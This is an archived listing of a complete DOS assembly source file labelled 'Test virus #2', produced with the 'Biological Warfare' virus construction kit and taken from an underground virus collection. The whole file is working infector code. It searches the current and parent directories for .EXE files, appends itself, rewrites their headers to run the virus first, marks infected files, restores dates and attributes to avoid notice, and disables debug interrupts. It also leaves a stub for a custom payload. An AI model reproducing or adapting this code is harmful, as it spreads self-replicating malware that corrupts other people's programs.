home *** CD-ROM | disk | FTP | other *** search
/ Underground / Underground CD1.iso / virii / virgen / bw100 / SAMPLES.ZIP / TEST2.ASM < prev    next >
Encoding:
Assembly Source File  |  1994-06-05  |  9.0 KB  |  304 lines
  1. ; test2.asm : Test virus #2
  2. ; Created with Biological Warfare - Version 0.90ß by MnemoniX
  3.  
  4. PING            equ     0A6CFh
  5. INFECT          equ     2
  6. MARKER          equ     08080h
  7.  
  8. code            segment
  9.                 org     100h
  10.                 assume  cs:code,ds:code
  11.  
  12. start:
  13.                 db      0E9h,3,0          ; to virus
  14. host:
  15.                 db      0CDh,20h,0        ; host program
  16. virus_begin:
  17.                 push    ds es
  18.  
  19.                 call    $ + 3             ; BP is instruction ptr.
  20.                 pop     bp
  21.                 sub     bp,offset $ - 1
  22.  
  23.                 xor     ax,ax             ; mild anti-trace code
  24.                 mov     es,ax             ; kill interrupts 1 & 3
  25.                 mov     di,6
  26.                 stosw
  27.                 mov     di,14
  28.                 stosw
  29.  
  30.                 in      al,21h            ; lock out & reopen keyboard
  31.                 xor     al,2
  32.                 out     21h,al
  33.                 xor     al,2
  34.                 out     21h,al
  35.  
  36.                 push    cs
  37.                 pop     ds
  38.                 lea     dx,[bp + offset new_DTA]
  39.                 mov     ah,1Ah
  40.                 int     21h
  41.  
  42.                 mov     byte ptr [bp + infections],0
  43.  
  44.                 push    [bp + exe_cs]
  45.                 push    [bp + exe_ip]
  46.                 push    [bp + exe_ss]
  47.                 push    [bp + exe_sp]
  48.                 call    traverse
  49.  
  50.                 call    activate
  51.  
  52.                 pop     [bp + exe_sp]
  53.                 pop     [bp + exe_ss]
  54.                 pop     [bp + exe_ip]
  55.                 pop     [bp + exe_cs]
  56.                 pop     es ds
  57.                 mov     dx,80h
  58.                 mov     ah,1Ah
  59.                 int     21h
  60.  
  61. exe_exit:
  62.                 mov     ax,ds                   ; fix up return address
  63.                 add     ax,10h
  64.                 push    ax
  65.                 add     ax,cs:[bp + exe_cs]
  66.                 mov     cs:[bp + return_cs],ax
  67.  
  68.                 mov     ax,cs:[bp + exe_ip]
  69.                 mov     cs:[bp + return_ip],ax
  70.  
  71.                 pop     ax
  72.                 add     ax,cs:[bp + exe_ss]        ; restore stack
  73.                 cli
  74.                 mov     ss,ax
  75.                 mov     sp,cs:[bp + exe_sp]
  76.  
  77.                 call    fix_regs                ; fix up registers
  78.                 sti
  79.  
  80.                 db      0EAh                    ; back to host program
  81. return_ip       dw      0
  82. return_cs       dw      0
  83.  
  84. exe_cs          dw      -16                     ; orig CS:IP
  85. exe_ip          dw      103h
  86. exe_sp          dw      -2                      ; orig SS:SP
  87. exe_ss          dw      -16
  88.  
  89. fix_regs:
  90.                 xor     ax,ax
  91.                 cwd
  92.                 xor     bx,bx
  93.                 mov     si,100h
  94.                 xor     di,di
  95.                 xor     bp,bp
  96.                 ret
  97.  
  98.  
  99. traverse:
  100.                 sub     sp,64                   ; allocate stack space
  101.                 mov     si,sp
  102.                 inc     si
  103.                 mov     ah,47h                  ; get current directory
  104.                 xor     dl,dl
  105.                 push    ds
  106.                 push    ss
  107.                 pop     ds
  108.                 int     21h
  109.  
  110.                 pop     ds
  111.                 dec     si
  112.                 mov     byte ptr ss:[si],'\' ; fix directory
  113.  
  114. next_dir:
  115.                 call    infect_dir
  116.  
  117.                 cmp     byte ptr [bp + infections],INFECT
  118.                 je      traverse_done
  119.  
  120.                 lea     dx,[bp + outer]         ; repeat in next dir up
  121.                 mov     ah,3Bh
  122.                 int     21h
  123.                 jnc     next_dir
  124.  
  125. traverse_done:
  126.                 add     sp,64                   ; reset
  127.                 mov     dx,si
  128.                 push    ds
  129.                 push    ss
  130.                 pop     ds
  131.                 mov     ah,3Bh
  132.                 int     21h
  133.                 pop     ds
  134.                 ret
  135.  
  136. infect_dir:
  137.                 mov     ah,4Eh
  138.                 lea     dx,[bp + find_me]
  139.                 int     21h
  140.                 jc      infect_done
  141.  
  142. next_file:
  143.                 lea     dx,[bp + new_DTA + 1Eh]
  144.                 call    execute
  145.                 cmp     byte ptr [bp + infections],INFECT
  146.                 je      infect_done
  147.                 mov     ah,4Fh
  148.                 int     21h
  149.                 jnc     next_file
  150.  
  151. infect_done:
  152.                 ret
  153. execute:
  154.                 push    si
  155.  
  156.                 mov     ax,4300h                ; change attributes
  157.                 int     21h
  158.  
  159.                 push    cx dx ds
  160.                 xor     cx,cx
  161.                 call    set_attributes
  162.  
  163.                 mov     ax,3D02h                ; open file
  164.                 int     21h
  165.                 jc      cant_open
  166.                 xchg    bx,ax
  167.  
  168.                 mov     ax,5700h                ; save file date/time
  169.                 int     21h
  170.                 push    cx dx
  171.                 mov     ah,3Fh
  172.                 mov     cx,28
  173.                 lea     dx,[bp + read_buffer]
  174.                 int     21h
  175.  
  176.                 cmp     word ptr [bp + read_buffer],'ZM'
  177.                 je      infect_exe              ; yes, infect as .EXE
  178.  
  179.                 jmp     dont_infect
  180.  
  181. fix_date_time:
  182.                 pop     dx cx
  183.                 mov     ax,5701h                ; restore file date/time
  184.                 int     21h
  185.  
  186.                 inc     byte ptr [bp + infections]
  187.  
  188. close:
  189.                 pop     ds dx cx                ; restore attributes
  190.                 call    set_attributes
  191.  
  192.                 mov     ah,3Eh                  ; close file
  193.                 int     21h
  194.  
  195. cant_open:
  196.                 pop     si
  197.                 ret
  198.  
  199.  
  200. set_attributes:
  201.                 mov     ax,4301h
  202.                 int     21h
  203.                 ret
  204.  
  205. dont_infect:
  206.                 pop     cx dx                   ; can't infect, skip
  207.                 jmp     close
  208.  
  209. infect_exe:
  210.                 cmp     word ptr [bp + read_buffer + 26],0
  211.                 jne     dont_infect             ; overlay, don't infect
  212.  
  213.                 cmp     word ptr [bp + read_buffer + 16],MARKER
  214.                 je      dont_infect             ; infected already
  215.  
  216.                 les    ax,dword ptr [bp + read_buffer + 20]
  217.                 mov    [bp + exe_cs],es
  218.                 mov    [bp + exe_ip],ax
  219.                 les    ax,dword ptr [bp + read_buffer + 14]
  220.                 mov    [bp + exe_ss],ax
  221.                 mov    [bp + exe_sp],es
  222.                 mov    word ptr [bp + read_buffer + 16],MARKER
  223.                 mov     ax,4202h                ; to end of file
  224.                 cwd
  225.                 xor     cx,cx
  226.                 int     21h
  227.  
  228.                 push    ax dx                   ; save file size
  229.  
  230.                 push    bx
  231.                 mov     cl,12                   ; calculate offsets for CS
  232.                 shl     dx,cl                   ; and IP
  233.                 mov     bx,ax
  234.                 mov     cl,4
  235.                 shr     bx,cl
  236.                 add     dx,bx
  237.                 and     ax,15
  238.                 pop     bx
  239.  
  240.                 sub    dx,word ptr [bp + read_buffer + 8]
  241.                 mov    word ptr [bp + read_buffer + 22],dx
  242.                 mov    word ptr [bp + read_buffer + 20],ax
  243.                 add    dx,100h
  244.                 mov    word ptr [bp + read_buffer + 14],dx
  245.  
  246.                 pop     dx ax                   ; calculate prog size
  247.  
  248.                 add     ax,VIRUS_SIZE + 3
  249.                 adc     dx,0
  250.                 mov     cx,512                  ; in pages
  251.                 div     cx                      ; then save results
  252.                 inc     ax
  253.                 mov     word ptr [bp + read_buffer + 2],dx
  254.                 mov     word ptr [bp + read_buffer + 4],ax
  255.  
  256.                 mov     ah,40h
  257.                 mov     cx,VIRUS_SIZE + 3
  258.                 lea     dx,[bp + virus_begin]
  259.                 int     21h
  260.  
  261.  
  262.                 mov     ax,4200h                ; back to beginning
  263.                 cwd
  264.                 xor     cx,cx
  265.                 int     21h
  266.  
  267.                 mov     ah,40h                  ; and fix up header
  268.                 mov     cx,28
  269.                 lea     dx,[bp + read_buffer]
  270.                 int     21h
  271.                 jmp     fix_date_time           ; done
  272.  
  273. activate:
  274.        ; Insert your routine here
  275.                 ret
  276.  
  277. courtesy_of     db      '[BW]',0
  278. signature       db      'Test virus #2',0
  279.  
  280. get_extension:
  281.                 push    ds                      ; find extension
  282.                 pop     es
  283.                 mov     di,dx
  284.                 mov     cx,64
  285.                 mov     al,'.'
  286.                 repnz   scasb
  287.                 ret
  288.  
  289. find_me         db      '*.EXE',0
  290. outer           db      '..',0
  291.  
  292. infections      db      0
  293. virus_end:
  294. VIRUS_SIZE      equ     virus_end - virus_begin
  295. read_buffer     db      28 dup (?)              ; read buffer
  296. new_DTA         db      128 dup(?)
  297.  
  298. end_heap:
  299.  
  300. MEM_SIZE        equ     end_heap - start
  301.  
  302. code            ends
  303.                 end     start
  304.